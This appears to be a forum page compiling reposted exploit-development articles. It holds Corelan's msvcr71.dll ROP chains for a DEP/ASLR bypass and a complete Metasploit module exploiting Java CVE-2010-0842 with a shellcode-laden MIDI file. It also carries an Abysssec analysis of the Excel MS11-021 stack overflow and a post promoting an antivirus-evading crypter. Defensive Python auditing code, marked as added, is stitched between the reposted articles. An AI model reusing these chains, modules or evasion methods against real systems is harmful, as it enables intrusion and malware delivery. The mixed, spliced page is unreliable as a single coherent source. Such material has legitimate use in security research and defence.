Everything posted by Nytro
-
[h=2]Universal DEP/ASLR bypass with msvcr71.dll and mona.py[/h]
Published July 3, 2011 | By Corelan Team (corelanc0d3r)

[h=2]Introduction[/h]
Over the last few weeks, there has been some commotion about a universal DEP/ASLR bypass routine using ROP gadgets from msvcr71.dll and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty. For the record, I don't know exactly what happened nor have I seen the proof… so I'm not going to make any statements about this or judge anyone. Furthermore, this post is not about the incident, but about the routine itself (which looks pretty slick) and alternative routines.

[h=2]The White Phosphorus version[/h]
Released as part of the White Phosphorus Exploit Pack, the routine only uses gadgets and a pointer to VirtualProtect from msvcr71.dll. That particular version of the dll does not rebase and is not ASLR enabled either, which makes it a perfect candidate for a universal/generic DEP & ASLR bypass, providing that it contains all required gadgets to perform a generic ROP routine. If your target application has that particular version of the dll loaded (or if you can force it to load one way or another), you can use the ROP chain to bypass DEP and ASLR in a generic way. Immunity Inc published the bypass technique on their website. The routine looks like this:

from struct import pack

def wp_sayonaraASLRDEPBypass(size=1000):
    # White Phosphorus
    # Sayonara Universal ASLR + DEP bypass for Windows [2003/XP/Vista/7]
    #
    # This technique uses msvcr71.dll which has shipped unchanged
    # in the Java Runtime Environment since v1.6.0.0 released
    # December 2006.
    #
    # mail: support@whitephosphorus org
    # sales: http://www.immunityinc.com/products-whitephosphorus.shtml
    print("WP> Building Sayonara - Universal ASLR and DEP bypass")
    size += 4 # bytes to shellcode after pushad esp ptr
    depBypass  = pack('<L', 0x7C344CC1) # pop eax;ret;
    depBypass += pack('<L', 0x7C3410C2) # pop ecx;pop ecx;ret;
    depBypass += pack('<L', 0x7C342462) # xor chain; call eax {0x7C3410C2}
    depBypass += pack('<L', 0x7C38C510) # writeable location for lpflOldProtect
    depBypass += pack('<L', 0x7C365645) # pop esi;ret;
    depBypass += pack('<L', 0x7C345243) # ret;
    depBypass += pack('<L', 0x7C348F46) # pop ebp;ret;
    depBypass += pack('<L', 0x7C3487EC) # call eax
    depBypass += pack('<L', 0x7C344CC1) # pop eax;ret;
    depBypass += pack("<i", -size)      # {size}
    depBypass += pack('<L', 0x7C34D749) # neg eax;ret; {adjust size}
    depBypass += pack('<L', 0x7C3458AA) # add ebx, eax;ret; {size into ebx}
    depBypass += pack('<L', 0x7C3439FA) # pop edx;ret;
    depBypass += pack('<L', 0xFFFFFFC0) # {flag}
    depBypass += pack('<L', 0x7C351EB1) # neg edx;ret; {adjust flag}
    depBypass += pack('<L', 0x7C354648) # pop edi;ret;
    depBypass += pack('<L', 0x7C3530EA) # mov eax,[eax];ret;
    depBypass += pack('<L', 0x7C344CC1) # pop eax;ret;
    depBypass += pack('<L', 0x7C37A181) # (VP RVA + 30) - {0xEF adjustment}
    depBypass += pack('<L', 0x7C355AEB) # sub eax,30;ret;
    depBypass += pack('<L', 0x7C378C81) # pushad; add al,0xef; ret;
    depBypass += pack('<L', 0x7C36683F) # push esp;ret;
    print("WP> Universal Bypass Size: %d bytes" % len(depBypass))
    return depBypass

(22 dwords)

Triggered by the Metasploit bounty "incident", the fact that Abysssec published a post/document just a few hours ago, and because Immunity already released the routine, I decided to take a look myself & see if there would be another way to build an alternative DEP/ASLR bypass routine from msvcr71.dll.

[h=2]The alternative version (mona.py)[/h]
I attached Immunity Debugger to an application that has the dll loaded, and used mona.py to create a database with rop gadgets & have it produce a rop chain. Since the one that is part of White Phosphorus doesn't have any null bytes, I will try to do the same thing. This is the result:

Command used :

17 seconds later, I got this :

rop_gadgets = [
  0x7c346c0a, # POP EAX # RETN (msvcr71.dll)
  0x7c37a140, # <- *&VirtualProtect()
  0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (msvcr71.dll)
  0x????????, # ** <- find routine to move virtualprotect() into esi
              # ** Hint : look for mov [esp+offset],eax and pop esi
  0x7c376402, # POP EBP # RETN (msvcr71.dll)
  0x7c345c30, # ptr to 'push esp # ret ' (from msvcr71.dll)
  0x7c346c0a, # POP EAX # RETN (msvcr71.dll)
  0xfffffdff, # value to negate, target value : 0x00000201, target: ebx
  0x7c351e05, # NEG EAX # RETN (msvcr71.dll)
  0x7c354901, # POP EBX # RETN (msvcr71.dll)
  0xffffffff, # pop value into ebx
  0x7c345255, # INC EBX # FPATAN # RETN (msvcr71.dll)
  0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (msvcr71.dll)
  0x7c34d201, # POP ECX # RETN (msvcr71.dll)
  0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
  0x7c34b8d7, # POP EDI # RETN (msvcr71.dll)
  0x7c34b8d8, # ROP NOP (-> edi)
  0x7c344f87, # POP EDX # RETN (msvcr71.dll)
  0xffffffc0, # value to negate, target value : 0x00000040, target: edx
  0x7c351eb1, # NEG EDX # RETN (msvcr71.dll)
  0x7c346c0a, # POP EAX # RETN (msvcr71.dll)
  0x90909090, # NOPS (-> eax)
  0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (msvcr71.dll)
  # rop chain generated by mona.py
  # note : this chain may not work out of the box
  # you may have to change order or fix some gadgets,
  # but it should give you a head start
].pack("V*")

Interesting… mona.py generated an almost complete ROP chain using gadgets and pointers from msvcr71.dll. It is slightly larger than the one written by Immunity (so yes, the one that is part of WP is most likely better), but I just wanted to see if there was an alternative available. The only thing that is missing from the one mona generated is a routine that would put the VirtualProtect() pointer (in eax) into esi. mona.py didn't find any obvious gadgets that would simply do something such as "mov esi,eax", so I had to manually search for an alternative. But as mona.py suggested, I simply had to find a gadget that would write the value in eax onto the stack, so you can pick it up in esi later on. In order to do so, you probably need 2 or 3 gadgets: one to get the stack pointer, a second one to write the value onto the stack and a third one to pick it up (pop esi). After searching the generated rop.txt file for a few minutes, I found the following 2 gadgets that will do this:

0x7c37591f : # PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN
0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN

That should work. Using those 2 gadgets, we can simply write the pointer to VirtualProtect() onto the stack and pick it up in ESI. In fact, the second gadget will write and pick up in the same gadget. We just need to make ECX point at the correct location on the stack and make sure POP ESI will take it from that location. Note that the first gadget requires EAX to contain a valid pointer to a readable location. So all we would have to do to make it readable is pop a readable address from msvcr71.dll into EAX first. Putting all of this together, the chain looks like this:

rop_gadgets = [
  0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
  0x7c37a140, # Make EAX readable
  0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
  0x41414141, # EBP (filler)
  0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
  0x7c37a140, # <- *&VirtualProtect()
  0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
  0x7c346c0b, # Slide, so next gadget would write to correct stack location
  0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
  0x41414141, # EDI (filler)
  0x41414141, # will be patched at runtime (VP), then picked up into ESI
  0x41414141, # EBX (filler)
  0x7c376402, # POP EBP # RETN (msvcr71.dll)
  0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
  0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
  0xfffffdff, # size 0x00000201 -> ebx, modify if needed
  0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
  0x7c354901, # POP EBX # RETN (MSVCR71.dll)
  0xffffffff, # pop value into ebx
  0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
  0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
  0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
  0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
  0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
  0x7c34b8d8, # ROP NOP (-> edi)
  0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
  0xffffffc0, # value to negate, target value : 0x00000040, target: edx
  0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
  0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
  0x90909090, # NOPS (-> eax)
  0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
  # rop chain generated with mona.py
].pack("V*")

31 dwords… 9 dwords larger than the commercial one from White Phosphorus… but it proves my point. It took me less than 10 minutes to build this chain, it's universal and bypasses DEP and ASLR.

Oh, by the way, in case you didn't know… if you have other bad chars (so let's say you also need to avoid using '\x0a' and '\x0d') then you could just run the following and get other pointers… yes, it's that simple.

!mona rop -m msvcr71.dll -n -cpb '\x0a\x0d'

[h=2]Conclusion[/h]
No matter how nice & 'tempting' a certain solution looks, there might always be an alternative, and creativity often leads to results.

© 2011, Corelan Team (corelanc0d3r). All rights reserved.

Read it at the source, goddamn vbulletin, don't bother with this crap.
Source: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
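The whole post rests on one property of msvcr71.dll: it is mapped at the same address on every run because it never opted in to ASLR. The following is an added audit check, not code from the Corelan post or from mona.py: it parses the PE headers of a module and reports whether it opts in to ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT), or has its relocations stripped. The flag values come from the PE/COFF specification; the header-only test images are constructed here.

```python
import struct

# Flags from the PE/COFF specification.
IMAGE_FILE_RELOCS_STRIPPED = 0x0001             # COFF Characteristics: image cannot be relocated
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # DllCharacteristics: opts in to ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DllCharacteristics: opts in to DEP


def pe_mitigation_flags(image):
    """Parse the DOS, COFF and optional headers of a PE image and report its
    relocation/ASLR/DEP opt-ins. Works for PE32 and PE32+ (DllCharacteristics
    sits at offset 70 of the optional header in both layouts)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: SizeOfOptionalHeader at +16, Characteristics at +18
    size_of_optional, characteristics = struct.unpack_from("<HH", image, coff + 16)
    if size_of_optional < 72:
        raise ValueError("optional header too short to carry DllCharacteristics")
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]
    return {
        "relocs_stripped": bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED),
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def loads_at_fixed_address(flags):
    """A module that never opts in to ASLR, or that cannot be relocated at all,
    is mapped at its preferred base on every run. That is the property the
    post relies on for a 'universal' chain, and what a defender audits for."""
    return flags["relocs_stripped"] or not flags["dynamic_base"]


def build_test_image(file_characteristics, dll_characteristics):
    """Constructed header-only PE32 image (no sections), enough for the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, file_characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Legacy build in the style of msvcr71.dll: relocatable, but no DYNAMIC_BASE / NX_COMPAT.
    legacy = build_test_image(0x2102, 0x0000)
    # Modern build linked with /DYNAMICBASE /NXCOMPAT.
    modern = build_test_image(0x2102, 0x0140)
    for name, img in (("legacy", legacy), ("modern", modern)):
        flags = pe_mitigation_flags(img)
        print(name, flags, "fixed address:", loads_at_fixed_address(flags))
```

Run it over the module list of a process (every loaded DLL) and any module that reports a fixed address is a candidate for exactly this kind of generic chain.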
-
Wi-Fi Security with Wi-Fi Protection Plus
Ajin Abraham, Joseph Sebastian
Vimal Jyothi Engineering College.
ajin25 @ gmail.com +91-9633325997
josephs_18 @ live.com +91-9495587202

Abstract
Current industrial standards of Wi-Fi security are found to have security loopholes, making it possible for hackers to break them. So we consider the possibility of a new technology for Wi-Fi security. We call it Wi-Fi P+ or Wireless Fidelity Protection Plus.

Introduction
Wi-Fi is common nowadays. Every educational institution and business organization has its perimeter covered in Wi-Fi. All the confidential data being transmitted through Wi-Fi makes it a target for hackers. To secure it, Wi-Fi security standards like WEP, WPA, and WPA2 were introduced, each of them when the previous security architecture was found to be a failure. But in the present situation all of these industrial-standard Wi-Fi security architectures are found to have vulnerabilities, so that a hacker can break into the Wi-Fi network.

Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18486.pdf
-
[h=1]Java MixerSequencer Object GM_Song Structure Handling Vulnerability[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
      'Description'    => %q{
        This module exploits a flaw within the handling of MixerSequencer objects
        in Java 6u18 and before. Exploitation is done by supplying a specially
        crafted MIDI file within an RMF File. When the MixerSequencer object is
        used to play the file, the GM_Song structure is populated with a function
        pointer provided by a SONG block in the RMF. A Midi block that contains a
        MIDI with a specially crafted controller event is used to trigger the
        vulnerability. When triggering the vulnerability "ebx" points to a fake
        event in the MIDI file which stores the shellcode. A "jmp ebx" from
        msvcr71.dll is used to make the exploit reliable over java updates.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Vreugdenhil', # Vulnerability Discovery and exploit
          'juan vazquez',      # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2010-0842' ],
          [ 'OSVDB', '63493' ],
          [ 'BID', '39077' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ],
          [ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/' ]
        ],
      'Payload'        =>
        {
          'Space' => 8000,
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "process",
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            # Tested successfully on:
            # Windows XP SP3 / IE 6 / Java 6u18
            # Windows XP SP3 / IE 7 / Java 6u18
            # Windows XP SP3 / IE 8 / Java 6u18
            # Windows XP SP3 / Firefox 7.0.1 / Java 6u18
            # Windows XP SP3 / IE 8 / Java 6u17
            # Windows XP SP3 / Firefox 7.0.1 / Java 6u17
            # Windows 7 / IE 8 / Java 6u18
            'Windows / Java 6 <=u18',
            {
              'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 30 2010",
      'DefaultTarget'  => 0))
  end

  def get_rmf
    rmf_header = ""
    rmf_header << "IREZ"             # RMFHeaderMagic
    rmf_header << "\x00\x00\x00\x01" # RMFVersionNumber
    rmf_header << "\x00\x00\x00\x02" # NumberOfRMFBlocks

    song_block = ""
    song_block << "\x00\x00\x00\x65"                 # OffsetToNextBlock
    song_block << "SONG"                             # BlockType
    song_block << [target.ret].pack("N")             # BlockID
    song_block << "\x00"                             # BlockName
    song_block << "\x00\x00\x00\x47"                 # BlockDataSize
    song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01" # BlockData
    song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08" # BlockData
    song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1" # BlockData
    song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86" # BlockData
    song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7" # BlockData

    midi = ""
    # HEADERCHUNK Header
    midi << "MThd"             # Header
    midi << "\x00\x00\x00\x06" # Chunk size
    midi << "\x00\x01"         # Format Type
    midi << "\x00\x01"         # Number of tracks
    midi << "\x00\x08"         # Time division
    # TRACKCHUNK header
    midi << "MTrk"             # Header
    midi << "\x00\x00\x24\xd7" # Length
    midi << "\x00\xb0\x80\x00" # Controller Event # Triggers the vulnerability
    # Fake Midi Meta event - Shellcode
    midi << "\x38"             # Variable length delta time
    midi << "\xff"             # Midi meta event
    midi << "\x02"             # Meta event type 02 => Copyright notice
    midi << "\xc9\x50"         # Variable Meta Event Length
    midi << payload.encoded
    midi << rand_text(9123 - payload.encoded.length)

    midi_block = "\x00\x00\x25\x60"  # OffsetToNextBlock
    midi_block << "Midi"             # BlockType
    midi_block << "\x00\x00\x7f\xff" # BlockID
    midi_block << "\x00"             # BlockName
    midi_block << "\x00\x00\x24\xed" # BlockDataSize
    midi_block << midi               # BlockData

    rmf = ""
    rmf << rmf_header
    rmf << song_block
    rmf << midi_block

    rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf"
    return rmf_name, rmf
  end

  def get_jar
    files = [
      [ "MyController.class" ],
      [ "MixerMidiApplet.class" ],
      [ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ]
    ]

    jar = Rex::Zip::Jar.new
    jar.add_file("META-INF/", "")
    jar.add_file("META-INF/services/", "")
    jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842"))
    jar.build_manifest

    jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar"
    return jar_name, jar
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.jar$/i
      print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-stream'})
      return
    end

    if request.uri =~ /\.rmf$/i
      print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, @rmf, {'Content-Type'=>'application/octet-stream'})
      return
    end

    base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    rmf_uri = base_uri + "/#{@rmf_name}"
    jar_uri = base_uri + "/#{@jar_name}"

    html = %Q|
		<html>
		<head>
		</head>
		<body>
		<applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200>
		<param name="midifile" valuetype="ref" value="#{rmf_uri}">
		</applet>
		</body>
		</html>
		|

    html = html.gsub(/^\t\t/, '')

    print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def exploit
    @jar_name, @jar = get_jar
    @rmf_name, @rmf = get_rmf
    super
  end

end

Source: Java MixerSequencer Object GM_Song Structure Handling Vulnerability
-
[h=2]Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)[/h]
Posted by shahin in Exploits / BUG Decryption

hello all
as we didn't publish any exploit for a bit, we are just going to release.

[h=2]1) Advisory information[/h]
Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability
Vendor : Microsoft Corporation
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

[h=2]2) Vulnerability detail[/h]
each excel file can contain multiple BOF (2057) records. This record specifies the first substream associated with the workbook. One of the fields in these records specifies the substream record to come with. This field can be extracted from the sub_3018F0C2 function.

.text:301A0C87 push [ebp+arg_2C]
.text:301A0C8A mov ecx, [ebp+var_14]
.text:301A0C8D push 1
.text:301A0C8F call sub_3018F0C2
.text:301A0C94 mov ecx, eax
.text:301A0C96 mov eax, [ebp+arg_24]
.text:301A0C99 cmp eax, ebx
.text:301A0C9B mov [ebp+var_10], ecx
.text:301A0C9E jz short loc_301A0CA2
.text:301A0CA0 mov [eax], ecx

If the field value is equal to 400, the sub_3019DFBA function is called to check the file type. If the file type is xls, EXCEL.exe will display a message; if approved, it will continue to run the code. If you change the file extension to xlb there won't be any message. After this step the sub_3053F626 function will be executed. This function will parse the next BOF records.

.text:304D4E9D cmp [ebp+arg_20], ebx
.text:304D4EA0 jnz short loc_304D4EC6
.text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h
.text:304D4EAC jnz short loc_304D4EC6
.text:304D4EAE mov edx, [ebp+arg_C]
.text:304D4EB1 mov ecx, [ebp+arg_8]
.text:304D4EB4 push 3Fh
.text:304D4EB6 call sub_3019DFBA
.text:304D4EBB cmp eax, ebx
.text:304D4EBD mov [ebp+var_8], eax
.text:304D4EC0 jz loc_304D4FD3
.text:304D4EC6
.text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j
.text:304D4EC6 ; sub_301A0BC7+3342E5j
.text:304D4EC6 push ebx
.text:304D4EC7 push dword_30EB89A4
.text:304D4ECD push [ebp+var_C]
.text:304D4ED0 call sub_3053F626
.text:304D4ED5 cmp dword_30F5E64C, ebx
.text:304D4EDB mov [ebp+var_8], eax
.text:304D4EDE jz short loc_304D4EE7
.text:304D4EE0 cmp eax, ebx
.text:304D4EE2 jz short loc_304D4EE7

one of the records that may come after BOF is an undocumented record which has record type equal to 0xA7 (167). For proper parsing, this record should come with another record with record type 0x3C (60). If it meets this requirement, the length of the records will be read and copied to the stack. The function which performs the copying of record data into the stack is sub_30199E55. This function takes three arguments. The first argument specifies the number of bytes to copy, which will be read from the file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data that can be copied.

The values of the second and third arguments are based on the amount computed from what is read from the file, and in this computing a computational error may occur here …

.text:3053F830 call sub_301A0A01
.text:3053F835 cmp eax, 3Ch
.text:3053F838 mov [ebp+var_ED4], eax
.text:3053F83E jnz loc_30540488
.text:3053F844 call sub_301A0A01
.text:3053F849 mov ecx, [ebp+var_EDC]
.text:3053F84F imul ecx, [ebp+var_F00]
.text:3053F856 mov edi, eax
.text:3053F858 mov eax, [ebp+var_EE0]
.text:3053F85E lea ebx, [ecx+eax+3]
.text:3053F862 call sub_301A0ABE
.text:3053F867 push 0FFFFFFFDh
.text:3053F869 pop edx
.text:3053F86A sub edx, ecx
.text:3053F86C add eax, edx
.text:3053F86E push eax ; Dst
.text:3053F86F push ebx ; int
.text:3053F870 mov eax, edi
.text:3053F872 call sub_30199E55

the vulnerability that exists here is that we can change the value of parameter 3 with our own values. The program will not correctly control the third argument of sub_30199E55, and this can result in the desired amount of desired data overwriting the desired location in the stack.

.text:30199E60 cmp edi, [esp+4+Dst]
.text:30199E64 ja loc_303EE1B7
.text:30199E6A mov ecx, [esp+4+arg_0]
.text:30199E6E push ebx
.text:30199E6F mov ebx, dword_30F726C0
.text:30199E75 push ebp
.text:30199E76 mov ebp, nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+10h+Dst], ecx
....
.text:30199E93 mov eax, [esp+10h+Dst]
.text:30199E97 push esi ; Size
.text:30199E98 lea edx, dword_30F6E6B8[ebx]
.text:30199E9E push edx ; Src
.text:30199E9F push eax ; Dst
.text:30199EA0 sub edi, esi
.text:30199EA2 call memcpy
.text:30199EA7 add [esp+1Ch+Dst], esi
.text:30199EAB add ebx, esi
.text:30199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text:30199EB2 mov dword_30F726C0, ebx
.text:30199EB8 jnz loc_301E0DB3

[h=2]3) Exploitation :[/h]
Stack overflows are not hard to exploit at all! But we have both /GS and SAFESEH here. Because we are destined to memcpy, we can change it so that it begins to overwrite the stack after GS, and from there, when the return comes, our values are contained in ESP and we can call it with a simple call esp and the game is over!!!

[h=6]download full exploit source : MS11-021[/h]
Happy Hacking .

Source: Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) | Abysssec Security Research
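The post's root cause is a file-controlled copy length reaching a fixed stack buffer. The following is an added example, not Abysssec's code or exploit: a BIFF record walker that enforces the BIFF8 record-size limit, a bounded copy with the check the post says sub_30199E55 lacks, and a detection pass that flags the 0xA7 / 0x3C (CONTINUE) record pair the post describes when the continuation payload would not fit the destination buffer. The stack buffer size is an assumed parameter (the post does not give it) and the workbook fragments are constructed.

```python
import struct

# Record types named in the post. A BIFF record is a 2-byte type, a 2-byte
# length and the payload, all little-endian.
BOF = 0x0809        # 2057
RECORD_A7 = 0x00A7  # 167, the undocumented record the post describes
CONTINUE = 0x003C   # 60
EOF = 0x000A
BIFF8_MAX_DATA = 8224  # largest payload a well-formed BIFF8 record may carry


def iter_biff_records(stream):
    """Walk a BIFF record stream, refusing truncated or oversized records."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        if rlen > BIFF8_MAX_DATA:
            raise ValueError("record 0x%04X at offset %d declares %d bytes, over the BIFF8 limit"
                             % (rtype, off, rlen))
        end = off + 4 + rlen
        if end > len(stream):
            raise ValueError("record 0x%04X at offset %d is truncated" % (rtype, off))
        yield off, rtype, stream[off + 4:end]
        off = end


def stream_is_well_formed(stream):
    """True when every record parses within the size and length limits."""
    try:
        for _ in iter_biff_records(stream):
            pass
        return True
    except ValueError:
        return False


def bounded_copy(dst, src, dst_max):
    """Copy into a fixed-size buffer with the length check that, per the post,
    the Excel copy routine (sub_30199E55) lets the file override."""
    if len(src) > dst_max:
        raise ValueError("%d-byte payload does not fit a %d-byte destination" % (len(src), dst_max))
    dst[:len(src)] = src
    return len(src)


def find_oversized_a7_continue(stream, stack_buf_size):
    """Detection pass: (offset, payload length) of each 0xA7 record whose
    following CONTINUE payload is larger than the assumed stack buffer."""
    hits = []
    prev = None
    for off, rtype, payload in iter_biff_records(stream):
        if prev is not None and prev[1] == RECORD_A7 and rtype == CONTINUE \
                and len(payload) > stack_buf_size:
            hits.append((prev[0], len(payload)))
        prev = (off, rtype, payload)
    return hits


def record(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def sample_stream(continue_len):
    """Constructed workbook fragment: BIFF8 BOF, the A7 record, a CONTINUE of
    the given size, EOF. Only the record framing matters for this check."""
    bof_payload = struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0)
    return (record(BOF, bof_payload) + record(RECORD_A7, b"\x01\x00")
            + record(CONTINUE, b"\x41" * continue_len) + record(EOF, b""))


if __name__ == "__main__":
    # Assumed destination size for the demonstration.
    STACK_BUF = 64
    print("benign :", find_oversized_a7_continue(sample_stream(16), STACK_BUF))
    print("suspect:", find_oversized_a7_continue(sample_stream(2000), STACK_BUF))
    print("malformed stream accepted:", stream_is_well_formed(sample_stream(9000)))
```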
-
[h=2]bypassing all anti-virus in the world (Good Bye Detection , Hello Infection)[/h]
Posted by shahin in news, Pen-test Method, reversing

hello to all readers

[h=2]Introduction[/h]
as you may have read on @abysssec on twitter, in the past few months we actually did a cool research on bypassing anti-viruses and got really great results. Bypassing anti-viruses is not a new topic and it's still about encrypting / decrypting a program to hide it from AV eyes. In the past it was a really, really easy task to do, but AVs are getting smarter, and bypassing all anti-viruses with the really unique methods that each of them uses is neither funny nor easy to do. Before I go further I'd like to give a simple glossary for unfamiliar readers.

[h=2]Glossary[/h]
Crypter : the program (mostly GUI) that will crypt the malware / bot to hide it from anti-viruses
Stub : the Decryptor of the crypted program
FUD : Fully Un Detectable (FUD = no AV detects it)
RUNPE : run the PE without headers in memory
USG : unique stub generator (makes unique stubs)
Binder : will join two files, will drop in HDD or mem
Pumper : will increase the size of the tool
EOF : end of file (in a crypter it needs to be preserved)
Cloner : will clone the file (Decryptor-like in HDD)
Icon Changer : will change the final exe icon

well, there are also two different kinds of crypters: scan time and run time. The good crypter is the run time one, because as its name says the scan time crypter is just FUD at scan time, and when you run it, after the real malware is decrypted it will be detected, so it is not that useful. And the real crypter is the runtime one.

[h=2]How it works ?[/h]
if we remove all the complex technical info, bypassing all 35 anti-viruses around the world works really simply. It simply encrypts the program, decrypts it, and then runs it in memory. The encryption algorithm is not important and simple ideas are enough to make a crypter FUD, but some of the most used algorithms are :
I. RC4
II. AES
III. DES
IV. TEA
V. XOR
VI. CryptoAPI
VII. blowfish

note that there is an important part in your job and that is running the malware safely in memory after decrypting it, and this is done by RunPE. The idea of RunPE comes from a great PoC by Tan Chew Keong called dynamic forking of win32 exe : SIG^2 G-TEC - Dynamic Forking of Win32 EXE. The steps and idea are really simple :
CreateProcess
Find Base address
Virtualalloc
Align sections
Fix thread context
Resume thread

but it is not easy to hide this kind of API chaining from anti-viruses. So we finished our research by writing a new FUD crypter, and our crypter is unique and different from the public ones. Our crypter is unique and can bypass all 35 AVs that exist right now. Here is the list of AVs we fully tested our crypter on:
- Ad-Aware
- AhnLab V3 Internet Security
- ArcaVir
- Avast
- Avast 5
- AVG Free
- AntiVir (Avira)
- BitDefender
- BullGuard
- VirusBuster Internet Security
- Clam Antivirus
- COMODO Internet Security
- Dr.Web
- eTrust-Vet
- F-PROT Antivirus
- F-Secure Internet Security
- G Data
- IKARUS Security
- Kaspersky Antivirus
